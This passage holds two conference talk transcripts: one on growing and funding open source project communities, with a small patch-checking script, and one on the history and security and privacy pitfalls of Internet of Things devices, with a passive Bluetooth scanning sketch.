essentially, it's a way of getting paid to contribute to open source. You're not always quite as well paid as you would be working for an IT company in Germany, but it gives you the ability to contribute to your favorite project and get money in return. In my opinion, it's quite a nice deal. Is it only for coders? Yes, it's only for coders, unfortunately. One hint concerning beginners and concerning giving support: people may not use the communication channels that you prefer. At Apache, we've got the saying that what didn't happen on the mailing list didn't happen at all, but there are people who prefer having their questions posted and answered on Stack Overflow.
So it does pay to spend some time there and fetch users from where they are, especially if your goal is to grow your community. Speaking of mailing lists: when you create your project, helping out isn't just about providing code samples, it's also about answering questions. So what we did at Apache Mahout is to give out the commit bit, like the OK to commit to Subversion back then; now it's Git. Just for people answering questions and just for people helping others grok the project, because machine learning isn't quite that easy. So we've had a couple of people who were into the field and who knew a lot of use cases, but didn't have the time to contribute code-wise. But they made great contributions on mailing lists, answering questions, giving architectural advice, et cetera. So at some point, if you have a project of your own, you want to reward that. Speaking of mailing lists, how many of you speak one more language than just English? Pretty much everyone. So there are projects that do a great job at providing localized resources, be it mailing lists for people who are uncomfortable communicating in English or whatever the project's native language is. There are also projects doing a great job at translating documentation. Just one example: there's the Apache HTTP Server project. They've got great documentation, not just in English, but also in German and other languages. So despite the fact that probably nobody installs the web server by going to the download button on the Apache website, people still come back to the Apache website for the documentation, which I think is a great thing, especially if you look at some of the major big data projects, where the documentation usually is lagging behind quite substantially. Okay, there may be users who are not fond of using mailing lists. There exist communication fora, in this case Discuss at Elastic, which provide good access both for people who are uncomfortable with using stuff like mailing lists and who would rather prefer to have a discoverable user interface, and which also provide a side channel that gets mirrored to mailing lists so that people can interact either way they want. Honestly, I'm a mailing list person, but at least for Elasticsearch, this thing is configured well enough so that I can deal with just using the browser front end. I wasn't convinced to begin with at all. Right now, I'm a convert. Okay, now you've got users and you've got potential contributors to your project; how do you turn them into contributors? One thing that I found helps is prioritization. Like, one of the most common questions we got at Apache Mahout was: I want to contribute. What can I do? Like, we'd say: go to the JIRA issue tracker and look for something that looks like it fits your needs. What's actually usually slightly more effective is to use the project yourself and fix something, a scratch-your-own-itch kind of issue, like fix something that bugs you hard enough. The second most common question you get is: when will you implement nifty feature X? What's the common answer for that? The common answer is: patches welcome. Sounds pretty deflective, pretty defensive, go away, I don't want that patch. What it truly means in the projects that I've been involved with is: I'm sorry, I don't have the time, please help me. So it's really an invitation to help the project out, and this is also how the project should be using it. Why shouldn't you use it as a defensive strategy?
If your user actually sits down writing this patch and from the very beginning you have no intention of merging it or using it, then this will turn into a huge mess and into a huge mass of frustration, because there's a user who put lots of time into it and probably spent a lot of time cleaning it up. So better tell them upfront: if you really want that, you're free to fork the project, go ahead, but this is not the direction that we want to go in. Now about inviting contributions. What I've learned the hard way at Apache Mahout is that you should be explicit about which kind of contributions you want. Apache Mahout is about machine learning, so what people thought we were after was just implementations of new machine learning algorithms. After a couple of years, this was the least wanted patch ever. What we wanted was cleanup, was more testing, was more documentation, was help on the mailing list, was help with public relations, was help with helping other users, et cetera. Was help with scaling, was help with benchmarking. At some point I sat down and wrote a call to action — Mahout needs your help — an email listing everything that was not writing a new algorithm. It helps to be very explicit about what you want. It also helps to write down how a contribution actually works, like step by step. This is how you check out, this is how you communicate. This is how you build, these are the tools you need for building, and this is how you contribute your patch. I know several senior-level software engineers who have no clue how to read a diff. They're great engineers, they do great architectural work, they do great coding, they still don't know how to read a diff or how to read a patch. If you want these people, and if you want to get them in, teach them and train them. What helps as well is to have an up-to-date issue tracker, so have real help requests there, track feature discussions there, and make it visible to others which problems are currently being worked on, or which have been decided as not being on the roadmap right now. A little anecdote to that: we ran a local Hadoop hackathon in Berlin, as a side hackathon to Berlin Buzzwords. We had many non-Hadoop coders there, but we also had a few core Hadoop coders. We ran a little poll: what do you want to do? Some people wanted to work on feature X, some people wanted to work on use case Y. What was by far the task that was most voted for was to get a walkthrough of how checking the project out, building it, making a change and contributing to the project looks like, and maybe getting a glimpse of what the other side of the fence looks like — what does the developer on the other end do with your patch. What helped for this hackathon was that the Hadoop project had a few issues in their issue tracker that were really trivial. Like, look, here's a typo in our documentation, go fix it. Here's a little typo in a variable name, go fix it. People had some tiny change that probably didn't break anything, and they could just walk through that process to get familiar with it. If you're living in this open source world, this feels really, really natural. If you're living in a corporate world where oftentimes code reviews aren't even common practice, this can feel very, very scary even to a senior person. Having these tiny issues that can get people started is very helpful. What else? What do you do if you have someone who submitted their first patch? Here's your patch. The clock's ticking. You want to give feedback early.
You want to automate as much as you can to avoid work on your side and decrease the time to first response. Hadoop does a good job with that. They've got patch checkers that check whether tests have been submitted and whether everything is correct style-wise, so no human being has to look at that. You also want clear rules for what constitutes an acceptable patch. If you say no, it's clear why. It's not a personal issue. Of course, people spending lots of time to work on a patch only to have it rejected don't make happy contributors. Don't go through these endless cycles. When you do this review, remember that people may do this on their corporate time. Context switching takes time. Projects move on. If it takes a couple of months to get this patch in, you may no longer get the feedback that you need. If this is an interesting patch, get the feedback and changes early on. Otherwise, you may have to do them yourselves. How can you motivate as well? You can ship chocolate. I once was offered iTunes coupons for doing a patch. I didn't accept the iTunes coupons. What was more important to me was to get a blog post about the patch in Mahout. I was essentially writing this blog post as a guest blog post, getting more reach. What I got as well for my first contribution was lots of thank yous. I got it in the Jira issue, so I didn't have to open it myself. I got it in the commit message plus the release notes. It's just a tiny little name mention. If you Google for my name plus the project, you'll still find it today. It was very helpful to have this name mentioned there in order to justify to my employer why I was doing that. Suddenly, this employer could go out bragging about how one of their employees is actually into open source, which for them, being a consulting company, was a big thing. But saying thank you only gets you so far. At some point, if people invest too much, you may want to think about getting some of it financed, getting some of it funded. How do you find payment? There are foundations whose whole purpose is to funnel money from sponsors to developers. There's VC funding for some projects. For some other projects, you can find freelance gigs for your collaborators. With that, a little warning: open source project owners and contributors usually wear multiple hats. In my case, multiple jackets. Today I'm wearing the Elasticsearch jacket, but I'm also talking about my experiences at the ASF, my experiences in the wider open source ecosystem. Always be aware of which hat you have on. Speaking of funding, what do you need funding for? You need funding for the machines to host your infrastructure, like issue trackers or version control. You can use canned hosting versus self-hosting. It's pretty common to use GitHub. Remember that if your project is long-living, GitHub may no longer be the coolest kid in 10 years' time. You may want to think about how easy it is to move all your assets out of that canned hosting. You need time to configure this infrastructure. Even if you use GitHub or even if you use an issue tracker that's hosted, you still want to configure it to meet your needs. You need machines to actually work on yourself, sitting in front of you, like your laptop. You need time to do this coding work and you need time to do the non-coding work. That's why you need funding. Most likely there are different sponsors for different points on that list. Speaking of funding, you can of course fund the ASF. That's how. If you need help, talk to me after this talk and I can get you on that list. Okay.
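To make the automated patch checks mentioned above a bit more concrete, here is a minimal Python sketch of the kind of pre-review bot that Hadoop-style projects run before a human ever looks at a contribution. The 100-character limit and the "does it touch a test file" heuristic are made-up examples rather than any project's actual rules; in practice something like this runs in CI and comments on the issue.

    #!/usr/bin/env python3
    """Toy pre-review check for a unified diff: does the patch touch tests,
    and do the added lines respect some basic style rules?"""
    import sys

    def check_patch(path):
        problems, touches_tests, touched_files = [], False, 0
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if line.startswith("+++ "):            # target-file header in a unified diff
                    touched_files += 1
                    if "test" in line.lower():
                        touches_tests = True
                elif line.startswith("+") and not line.startswith("+++"):
                    added = line[1:].rstrip("\n")
                    if len(added) > 100:               # arbitrary style limit for the example
                        problems.append(f"diff line {lineno}: added line longer than 100 characters")
                    if added != added.rstrip():
                        problems.append(f"diff line {lineno}: trailing whitespace")
        if touched_files and not touches_tests:
            problems.append("patch does not seem to touch any test files")
        return problems

    if __name__ == "__main__":
        issues = check_patch(sys.argv[1])
        for issue in issues:
            print("WARN:", issue)
        sys.exit(1 if issues else 0)

The specific checks matter less than the effect: the most repetitive part of the review happens within minutes and without burning a committer's time.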
Another thing, communication. You want to communicate your vision very clearly. You can tell people what's going on. You can keep people out and stop them from spending time if what you do is actually not what they need. You can embrace people and pull them in if this is what they really need. Also tell them what your priorities are, to avoid discussions about which patch is better — what is better depends on your definition of quality. If you work in a tiny team, one-on-one communication is great. If the team grows, it turns into mass media and doesn't scale anymore, so you want a central hub. What kind of communication channels can you have? You can have meetings in person. They're really high bandwidth. You can talk to each other, you can see each other, you can communicate, you can talk back and forth. That comes at the expense of the setup. They are synchronous both in time and space, so you have to ship people to one location. They are also not durable, because they have to be repeated for every new human in the project. Let's go a step back. We do a video chat. The bandwidth is still pretty high, but reduced in two ways: you see the faces, but a little less body language. It's still pretty expensive to set up because it's still synchronous in time. Imagine having one person in Australia, one person in the US. It's going to be really, really tricky. It needs good technology. You need a good internet connection. You need a good computer. If you've got someone whose internet connection is bad, this is probably not an option. Also it's barely durable. Imagine having to watch all the video chats again when you join the project. You're not going to do that. You can go for an online group chat. IRC is popular, there's HipChat, there's Slack, whatever. It's lower bandwidth. It's text only. There are just little cues, like your partner is typing right now. It's also cheap to set up, but it's still synchronous in time and it needs a decent client. It's rather durable because you can search the logs, but trust me, it's hard to follow in retrospect. Web fora are low bandwidth, text only, cheap to set up. Suddenly it's asynchronous. Somebody can post a question. Somebody can post the answer once they are online, and there's no need for them to coordinate. It's pretty durable. You can search these discussions. You can follow archived discussions. It's pretty nice. Mailing lists are similar. Text only. You can use the issue tracker. It's nice because it's low bandwidth, asynchronous, durable. It's well structured, but it's really fine-grained. If you look at the bug tracker of Elasticsearch core, you will have a hard time figuring out what the strategy is unless you know exactly how this bug tracker is being used by the project. For higher-level views, you can use wiki pages. Sometimes structured. You can go for web pages, which hopefully are really well structured, which lead you through everything you want, which have documentation, which have a high-level view. What I want to tell you is: use the right communication medium for the task at hand. You will have to use all of them. If you have a burning conflict where people are fighting each other, get them on a video chat to talk to each other. Sometimes it goes both ways and it's fine. Sometimes it's just like, okay, technology failed us. We misinterpreted — there was a misinterpretation of state. Like when I call my husband and O2 tells me that his line is busy, and it's not actually busy, but he's just clicking me away because he's in a meeting.
We talked an hour later and we figured out O2 was the culprit. Everything is fine. No need to communicate through the broken channel anymore. What you do want is one canonical place for keeping current status. Where do you go to figure out if a build failure is fixed already? Is that on the mailing list? Is that in the issue tracker? Is that somewhere else? Have it in one place. You want one canonical place for documentation. No separation there. You want one canonical place for tracking previous decisions. The long-term memory is provided through mailing lists mainly. It can be different at different projects, but have one place where people can go. If you pull more and more people in, you suddenly will have to think about mental health and you will have to think about overcommitment. One thing to avoid: avoid the cookie-licking effect, jumping on every task. I'm going to do it. Five months later, it's still sitting there. There's a couple dozen people who could have done it, but didn't do it because you jumped on it. Leave it there. Leave it sitting if you don't do it immediately. Maybe someone follows up. Avoid getting too much on your plate. At some point, you will need to tell people: my pipeline is full. Patches welcome. Please help me out. Ask for help. There are a few nice pages, especially at Apache, on remaining sane and not overcommitting. You will also have to think about physical health. If you're sitting at your laptop for hours and hours and hours, there's a good chance that your hands will be very angry with you. There's a good chance that your neck will be angry with you. I have a better time carrying my 11-kilogram child all day than sitting in front of my laptop all day. My neck is worse when I'm sitting in front of my laptop all day because I'm all huddled together. There was a great keynote at Berlin Buzzwords two years ago by Eric Evans on ergonomics and what pain he went through by not following this advice. If you don't believe my words, watch this keynote — you will probably believe him. You will also need to think about project growth. As soon as you have several people working on your project full time, for newcomers that will feel like drinking from the firehose, because multiple people are contributing eight hours a day to your project. So if you want to have a diverse community, you will need to find a way to enable those who don't have that time — who are probably doing it after work or just as a side project at work — to follow up with what's going on. You will also need to deal with poisonous people who try to destroy the culture of your project by trolling or by asking the same questions over and over and being very persistent. So you will need to figure out strategies to identify these people, to gather data about what's happening and how much energy is actually being drained from your project, and to kick them out if worst comes to worst. There are a few talks, one by Ben Collins-Sussman and one by Brian Fitzpatrick, on dealing with poisonous people. There is a great YouTube recording of a talk that Kristin Koentop gave at this very conference a few years ago on how to deal with flame wars and broken communication.
There's also a nice presentation on the Rust community online that talks about how publishing acceptable and unacceptable behavior, together with the countermeasures that are going to be taken if you break this contract, can help build a friendly community and can help keep people out that you do not want. Because one thing to keep in mind is: no matter which rules you set up — even if you don't set up any rules — you will always exclude some people. And somehow some culture will evolve. My advice would be to build this culture consciously, to read up on strategies for how to build the culture that you want to see. Some culture will evolve either way; it may not be the one that you want. Finally, change management. What's the biggest change in an open source project? The leader leaves. Nobody is there anymore. Prepare your exit well in advance. Me personally, I did Berlin Buzzwords for the first time in 2010 with no intention of running this event more than once. Fortunately, we had attendees who wanted to come back. So now I was left with a conference that depended on me doing all the marketing, all the outreach, all the sponsorship. Fortunately not all the accounting — that's what I had a producer for — but I still had to do the talk selection together with a few other open source contributors who helped me with this conference, one being Simon Wilner, the other one being Leon Lainard. But suddenly we had to find a way to make this conference stand on its own feet. For me personally, it took four years to get rid of this conference without breaking it. So build this handover in from the beginning, document from the very beginning, delegate from the beginning, and find a way to build a memory into the project you do. So it's really mostly about delegation. And with that, it's time for me to wrap up and to start the discussion, because I want your feedback and I want your questions. If you have any questions, I have the microphone. Well, come on. So what I'd like to ask you is: if you set up a project and you don't have the right communication culture, are there any hints you could give us to improve on that? The first one, about improving culture: lead by example — you should be the committer that you want to meet coming to the project. For the other ones, there are tools out there, one book by Peter Higgins on building successful open source communities. There's one on building successful online communities that you can read where there are actual tools — gamification tools, being transparent, et cetera — that help you do that. There's quite a bit of literature that can help you. One thing that I find helps is to lead by example. This helps very much. The other one is, if there is rude behavior, to keep the discussion technical, but to call out people on their rude behavior and then lead the discussion back to a technical topic. What also helps: sometimes you read an email and you're really upset about it. What helps is to take a breath, walk away from the keyboard, come back and reply to this email in a sort of professional context, keeping most of this anger out and keeping all of the ranting out. What you need for that is some distance between you and the email you are answering. One hint for the first three questioners: you should go to the Elasticsearch booth. There's a surprise waiting for you. Okay, I'm lucky then, I think.
I wanted to ask what worked best for you for event management from the infrastructure side. I've been organizing events myself and I've been struggling to find an open source solution to gather all the details for a conference, for example. What do you mean — infrastructure for accounting, for managing speakers? Yeah, for managing speakers, websites. I do have an event producer; I don't like the systems they are using. The one that I like from a speaker's perspective is the one that FrOSCon is using, and that is frab. There's also a talk, I think today — I don't know — about what tools FrOSCon is using. If you don't make it to this talk, check the schedules; there will be a recording of it and they will talk at great length. I'm interested because I'm a mentor at Google Summer of Code and we are doing an open event tool and we want to improve it and maybe work also on that. Thank you. Over there. Hello. Thank you very much for the inspiring talk. I was just wondering: this is now a very long list of very big words, and if in the beginning you are just one coder with one idea, where do you start? I feel a little bit overwhelmed. Do you take a depth-first approach where you say, okay, I do the code and then I spread out, or do you go breadth-first before I code anything? Do I start building up all the departments? It depends on your preference. The way I started with Apache Mahout was that I tried to find — so my goal was to build something not necessarily to build a business around, but to build something that would be bigger than me. The first step I did was to find people that are like-minded, that want to do the same thing. What we together then did was to figure out if there's a project already there that covers our use case. Unfortunately, there wasn't. The third thing then was, okay, we decided on a license, we decided on hosting and then we go coding. We never forgot about getting new people in. It really depends on your goal. I think there was another question. Yes. First, thank you very much for the talk. Very interesting. Second, I was wondering if you know any studies, because you spoke about how it's very important to answer quickly when people contribute, otherwise they might get lost, and that makes a lot of sense. But I'm wondering if you know any numbers around how many contributions might be lost in open source projects. No clear numbers. No clear numbers. Sorry? No numbers. Okay. It's interesting. It would be an interesting study. We work at the same company. You can go to Elasticsearch core. Check our GitHub issues and see how old they are. I'm actually thinking of doing it. Go ahead. So we have one more giveaway because he's working for the same company, the same gimmicks. Sorry. One more question. Come on. It's like Rubik's Cubes. There's power chargers. So I'm not talking about pens. Yeah. Here you are. One thing I didn't hear you talk about is that when one's thinking about coding, one often tries to make the number of differences in approach to a project as small as possible from established practice. It seems to me there are big advantages doing the same thing on the non-coding side, especially if, for example, you talked about walking people through the committing process. There will be a lot of people who are familiar with committing to other open source projects, and presumably there's quite a lot of mileage in making your process only different when it's really important to your project.
I suppose I was wondering really whether you have anything to say about resources for, I suppose, turnkeying that in the same way as you can turnkey quite a lot of the technical infrastructure for a project. So the reason why Apache Mahout is Java is because at the time when we created this project, there was a huge number of Java developers. So we knew that there's just a tiny fraction of people who know about machine learning, and going for some exotic programming language would even further reduce the community that we could draw from. So that's why we decided on Java. The reason to go for Maven slash Ant was because they were well-known, well-established build systems, so that people who get started know how to get started. You may hate Maven as much as you want. If you want to make it easy for Java devs to contribute, make your project follow the Maven structure so they know where the source code is lying, so they know instantly how to get stuff into the IDE without reading documentation. Any additional hurdle makes it even harder for people to get started. That's very, very true. So those are all technical choices about the project. I was really wondering the same thing, maybe more with processes on the non-coding side, so making it as easy for people to apply their knowledge from other projects on the non-coding side as it is on the coding side, in the way you're talking about using skills that are common technical skills. So for some of the topics I've been talking about, you don't see a lot of commonalities between projects. I only have experience with the ASF, and only within the last six years, so it may well be that similar processes exist within the Debian community, the Fedora community, and what have you. I can't talk about that because this is simply not my background. What I found helpful when getting started with projects is to write down some of these processes. When I started at Apache: nothing, I didn't find the documentation. Try Googling for Apache Jenkins. What you find is the documentation on how to set up Jenkins behind Apache. You don't find the Jenkins of the Apache Software Foundation. Not helpful. So you need some good documentation on how things work. It does help to look across boundaries. If you are within the ASF, it does help to have some insight into other communities. What I realized from my own background is that this kind of looking behind the scenes is pretty time-consuming. So I've got some insight into the Linux kernel community by virtue of having a husband who is into this community. I've got some insight into the FSFE just because they are also in Berlin and I know some of these people. This is how it works, but it's time-consuming. I know few people who have experience with crossing community boundaries and comparing things and how things work. That's definitely something that I would find interesting. Okay. No more gimmicks. It doesn't mean no more questions. But you can talk to me afterwards. So you will be around at your booth for the remainder of the day? I have a booth: the children's room here. So I've got a little giggler with me and I've got my husband with me. If you see a little girl about — she's eight — with a pitchy-patchy penguin, I'm probably not far away. All right. Then once again, thanks for your insights on project management for open source projects. Thank you very much.
|
Your project's code base is rock solid, you are rolling releases early and often, your test suite is comprehensive and running regularly, your code is well performing without any glitches. Everything is in place that defines a successful open source project - or isn't it? This talk tries to highlight some of the key questions software developers will quickly be faced with when dealing with open source: In addition to coding skills, topics like people management, naming, trademark enforcement, licensing, patents, pr and more become topics to deal with.
|
10.5446/32437 (DOI)
|
So I guess we'll go ahead and get started here. And we're going to start all the way back at the beginning with the ENIAC. And this was not exactly an Internet of Thing. It was just a thing at the time, because it was the first general purpose computing device. And as you can see, it was huge. It was big. I mean, Phil, the entire room took like two or three people to actually program it and ran at the whopping speed of zero point very negligible megahertz. And these were great. This is a device that actually defined every computing device that has come since it. And even 20 years later after the ENIAC, this is five megabytes of storage. And they're loading this onto a large cargo jet at the time. Actually, I'm sorry, it's not even a cargo jet. It's just a large cargo airplane. That's five megabytes of data. How many people, when you snap a picture, generate more than five megabytes of data? The entire room should be raising their hand. So you can't even fit something that your cell phone camera is generating onto one of these. I mean, every time I snap a picture out of one of my real camera, it's like 26 megs. I would need five or six of these things just to store the bloody image. And this is the Internet. Quite literally in March of 1977, you can draw the entire Internet on a piece of paper. And so this is 20 years even after the picture I just showed you. And it's not very big, but everybody understood it at that point. And everything that is on that, I mean, this is literally the dawn of Internet of Things. This is good old ARPANET. This is the prelude to all of the Internet. And this is where we work. This is what has started the fundamental creation of Internet of Things. And this is where we are today. We've got cell phones that have more computational capacity than every computer that existed until the late 1980s. And that's in your pocket, let alone just the GPU itself to make the little animations in Pokemon Go, dance around, and you throw Pokemon balls at them. It's mind-boggling how much power is in a cell phone these days. Storage. So I showed you a picture of five megabytes. The smallest chunk of storage, removable storage, that you can get your hands on easily these days is 200 gigabytes and a microSD card form factor. That's something that's half, or a third the size of a postage stamp that's holding 200 gigabytes of storage. And the Internet has grown just a little bit. This is an attempt to map the Internet in 2011. It's gotten bigger since then. And the problem is, is that this is all technology that was there five minutes ago. Everything is changing so rapidly these days that even trying to describe what is currently out there is outdated. Because storage, when I double checked this earlier today, 200 gigabytes of storage may have been the maximum you could have bought. Within the last five minutes, although it is a Saturday, somebody could have announced an even bigger chunk of storage. The Internet has grown so astronomically since 2011 in comparison to that picture that it can't even really be displayed. I mean, there are so many nodes now on the Internet, particularly with the advent of IPv6, that it's hard to even fathom the number of devices that are getting connected to the Internet and the number of cell phones that are out there. I mean, how many people have a drawer full of cell phones that they've just thrown away because they still have data on them and they don't want to do anything with it? 
I'm sure everybody in this room has a drawer full of them somewhere. I know I do. I think I've got two now, actually. But that's where we're at right now. Kind of. But this is where we're headed, because, really, this is the IoT bus. And we want to know what's coming, what's around the corner, why is this all being done, and what's all broken with it, and what can we do about that? And that's the interesting part here. So an oven. An oven is a really simple device. You plug it in to either a gas line or an electrical main. You turn it on and it makes things hot. And you turn it off before your house burns down. This is a really great idea. So what's the one thing we should do with that? Let's hook it up to the Internet. Because that's a great idea. Because then I can turn it on and off remotely with my phone, because that's not a bad idea at all. Coffee maker. Because the first thing you do when you get up in the morning is you pull your phone out and you're like, I want coffee. Honestly, I can't actually see anybody doing that. I'm not sure that the phone works before the coffee's been had. So you've got kind of a chicken and egg problem. I need to turn the coffee maker on. But I... Crock-Pots. Again, a device that makes things get hot, controlled by your cell phone. And kind of venturing off. I mean, IoT really is pervading everything. So I've talked about three little kitchen gadgets. First Response, in the last six months, I believe, came out with a Bluetooth-enabled pregnancy tester. This is honest to God. Honest to God. It's a $20 pregnancy tester. This is literally a throw-away Bluetooth low-energy device. It's a one-time use. And if the device finds that you're pregnant, it actually pops up all this information on your cell phone, giving you offers for diapers and where to go and do all these kinds of things. I mean, it's an absolutely brilliant and horrible idea at the same time. And I would love to have been in one of the marketing meetings where somebody goes, so we want to add a Bluetooth low-energy device with a microcontroller to this whole thing. Because the amount of technology that is required to read out even the data off of the test strip is astronomically amazing. I mean, this is modern medical science, where technology is actually capable of doing on-the-spot reading of information and then sending it to your cell phone to send you coupons. And of course, with this being Internet of Things, it connects to the cloud and it reports back to First Response on a bunch of different things. And there's another device that I'm not including in here for some very specific reasons. If you're very curious, go and take a look at some of the talks from DEF CON this year. It's another very personal device that was found to be... While it was being used, it was actually reporting data back to the parent company. This is incredibly private information. It's being reported back up to the company. And these things exist. We've got... Continuing in the medical line, we've got pacemakers. How many people want something that's connected directly to your heart being controllable via Bluetooth? That's a great idea, right? How's the security on Bluetooth? Anybody want to give me their Bluetooth password? Really? Takers? And okay, you've got medical devices, but home locks. Out of curiosity, how many people have a digital lock on their houses at home? Anybody? One. Z-Wave? No? I don't manage it. Oh. So is that the Internet of Parents?
But I mean, technology is now literally opening doors for us. You walk up. Oh, the power's out. I can't open... Oh. And in the same vein as door locks, we've got power outlets. These devices that connect in between like your refrigerator and your wall outlet. And what's the worst possible thing that could go wrong with a power outlet being connected to the Internet? I won't actually answer that question because it's really, really horrible. Oh, okay. The worst thing that could possibly happen is you hook this thing up to your refrigerator. You see that button on the front? Because this actually happened to me. Somebody bumps the refrigerator, turns it off. At which point you're like, huh, why doesn't that work? You figure out what's going on, you turn it back on, and then somebody bumps the fridge again. And the whole thing turns off. At which point this part didn't happen. You get botulism poisoning because everything in the refrigerator goes bad. And you die. And speaking of refrigerators, the Internet-connected refrigerator. How many people have ever even seen an Internet-connected refrigerator? How many people want an Internet-connected refrigerator? Honestly. Okay, one. Okay. Why do you want it? It's a nice phone? Oh, a nice toy. I'm sure that people... There's a lot of other people who thought it was a very nice toy too. A few years ago, every Internet-connected fridge in the world was used as a spam relay. That's a really nice toy. But yeah, I mean, it'll display your calendar. It'll tell you when the next soccer game is, and it will tell you exactly what that little blue pill that we all desperately...or so desperately need is and where we can buy it on the Internet because it's totally not fake if it's on the Internet. And this is just the default security permissions because there was a web browser and people would go browse the Internet from the refrigerator. Doorbells. You push the doorbell, it lets you know who's there, and this is kind of like the door locks. And TVs. Oh, TVs. How many people have a smart TV? I'm sorry. How many of those have cameras on them? Anybody? One. One brave soul who's going to admit that he's probably been infected with a virus on his TV and is streaming himself sitting on the couch watching TV to everybody. Oh, you've got a sticker on it. Oh, you are better than most people. So I'm going to digress on the TVs a little bit because this is going to be kind of a digression for everything here. Internet-connected things are scary. They're really, really scary because once they're connected to the Internet, they have a tendency for a variety of reasons to want to dial back home somewhere or give you access to, well, the Internet. I mean, this is kind of the Internet of things. And the Internet is a really dangerous place. It is a surprisingly dangerous place. And there are people setting up spam relays on refrigerators. And there's a lot of new evidence that's coming out about smart locks being trivially openable from the Internet, ovens and crockpots accidentally burning things down. I mean, this is one of the things that we've got to really start thinking about as we build these devices because IoT isn't going away and it's going to get more pervasive. Like thermostats. How many people have heard about the recent issue with, I believe it's the Nest, I think it was specifically the Nest, just completely winging out and turning off heat in the middle of winter? Because a couple of people have heard about this. 
If you haven't, it's actually a really interesting article. Don't look it up. But the short answer is there was a software bug and it just turned off heat in thousands of homes in the middle of winter. Because that won't lead to burst pipes and people freezing to death and pets freezing because they were left in a house that they believed was going to be heated. I mean, there's definitely some interesting aspects to that, or to all of that. And again, so we've just talked about thermostats, which aren't that dangerous. Let's talk about a smoke detector that's connected to the Internet. What could possibly go wrong? I mean, everybody's been woken up by that. I swear it's 3 AM every single time this happens. It's 3 AM and the battery alarm starts going off on your smoke detector, right? So what happens if somebody can just trigger that all the time? Like every 20 minutes? Or silently not tell you when there's actually a fire or carbon monoxide or something? And thermostats, I mean, not even thermostats, but thermometers connected to the Internet. This one, in fact, you plug into your phone. You can see the headphone jack on the left there. You plug it in, you get your temperature. And why does this need to be connected to a cell phone? Do I really need to upload my temperature being 98 points, something or other, in the magical Fahrenheit system that apparently is magical and nobody understands over here? Sorry, I'm from America. I'm sorry, America. Oh, what happens when you plug the other side? I don't know, actually. I would not recommend trying... Oh, you can take the temperature of your smartphone. Maybe. I don't think it'll work that way, though. I think you'll just short something out and everything will explode, which, like, you know, gets hot at that point. God, I love these slides for no other reason than I get to just joke about random products that exist. Okay. And the device that everybody will recognize. This is one of the greatest IoT devices in the world. The Linksys WRT54GL. You know how many things the WRT54GL has been plugged into and hooked up to and made do things? Everything! You know, thermostats, thermometers, Roombas. You've never seen a WRT54GL running around on a Roomba, usually with a knife. It's an amazing thing. Go look for the videos on YouTube. I wish I could actually show them, but I didn't think to add that. But these are one of the most... I mean, the WRT54GL is just indicative of a device that everybody has. And you know, everybody in this room probably understands how it works. How many people know how a network works, actually? Okay. Yeah. Three quarters of the audience raised their hand. How many people think that everybody else in the world understands how this works? No one? No one's going to take that. Oh, yeah. And I put this up here for a very specific reason. I've got a few more devices I'm going to show in a minute. But every one of these devices wants to be on the Internet. But nobody knows how to configure that, except for about the three quarters of the people in this room. Which none of you get hit by a bus because the world would lose a great many people. So all of these devices figure out really neat ways to dial back home. Usually by setting up a reverse proxy. They dial back out and then they connect to some magical central server so that your cell phone, when you're standing here in Germany, can talk to your device that's sitting in Portland, Oregon. Because not doing that over a VPN, well, one, VPNs are hard. 
Nobody can set one up, except for the three quarters of the people in this room. And two, well, it's just usability issues. Most normal users, they don't understand their networks very well. And some of that's our own fault for making networks hard. And some of that's just because networks are hard. And companies want to make... Everybody wants to be able to control their thermostat from their phone. They want to be able to control their IP... Look at their IP cameras or the random outlets or their coffee maker, assuming they're not first thing in the morning. And they want to be able to check, oh, did I leave the stove on? How many people would have loved to have had a did-I-leave-the-stove-on app for their phone when they're going away? Yeah, a couple of people. I mean, the convenience factor for a lot of these devices really is there. The internet is actually bringing something to these devices that didn't exist before and is really important and really powerful, except for the coffee maker. I still... Again, don't understand. The smart outlets, I mean, a lot of these smart outlets even include devices to monitor energy usage. And if they reach some magical level, they'll turn things off. I mean, I know people who are hooking these up to soldering irons to prevent themselves from accidentally burning down their shops and their labs. I know people who are hooking them up to all kinds of different things for either safety purposes or monitoring purposes. Or even just, oh, well, I'm not in that room, I'm just going to turn it off. Because everybody carries their cell phone around with them all the time, right? This is the most wonderfully trackable device in the universe. Constantly broadcasting Wi-Fi, constantly broadcasting cell signal, and for most people, constantly broadcasting Bluetooth low energy, or at least Bluetooth. If you had the right sensors around your house, you could pinpoint yourself within inches inside your house, and you could turn devices on magically as you wander from room to room. Because that's both a brilliant idea and one of the scariest things I could even remotely think of. And we've got Fitbit. How many people have a Fitbit? Is there only like three of us in the entire room? Wow. Okay. Maybe this is more an American thing, but almost everybody has one of these devices. The really neat thing is, I could be an absolute jerk right now and run the sync program on my cell phone. And every Fitbit in this room will get synced to the cloud. And I've never seen you before in my life. And there was another gentleman over here, and I've never seen you before in my life. And yet my cell phone will pull data off of a device that you are carrying on you, filter all of that through it, which means that I also have all of your data. How awesome is that? Wait. Yeah. And I mean, some of the Fitbits even have a rudimentary ability to track kind of where you're at. They're not quite GPS accuracy, but they can kind of give you, you know, oh, well, you walked like this way. I mean, these are really complicated accelerometers. And you can do dead reckoning based on a really good accelerometer, which means that all of that data about where you've been, yeah, I have that now too. I mean, for all I know, you know, I could pull up this data and you could have been at McDonald's an hour ago. Probably weren't, but I'm sure you were in a talk. But you know, a lot of the Bluetooth low energy devices that are out there actually do this.
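For a rough idea of what "doing this" looks like from a bystander's laptop, here is a small Python sketch using the third-party bleak library to passively log Bluetooth low energy advertisements. It records only whatever address and name a device chooses to broadcast — no pairing, no authentication — and, as a caveat, many newer devices randomize their advertised addresses precisely to make this kind of passive tracking harder.

    """Passive BLE advertisement logger (sketch). Requires the 'bleak'
    package and a Bluetooth adapter; prints whatever happens to be
    advertising nearby."""
    import asyncio
    from datetime import datetime
    from bleak import BleakScanner

    async def main():
        while True:
            # discover() listens for advertisements for a few seconds
            devices = await BleakScanner.discover(timeout=5.0)
            stamp = datetime.now().isoformat(timespec="seconds")
            for dev in devices:
                # A fixed advertised address is enough to recognize the same
                # device again later, without ever talking to it.
                print(f"{stamp}  {dev.address}  {dev.name or '<unnamed>'}")

    asyncio.run(main())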
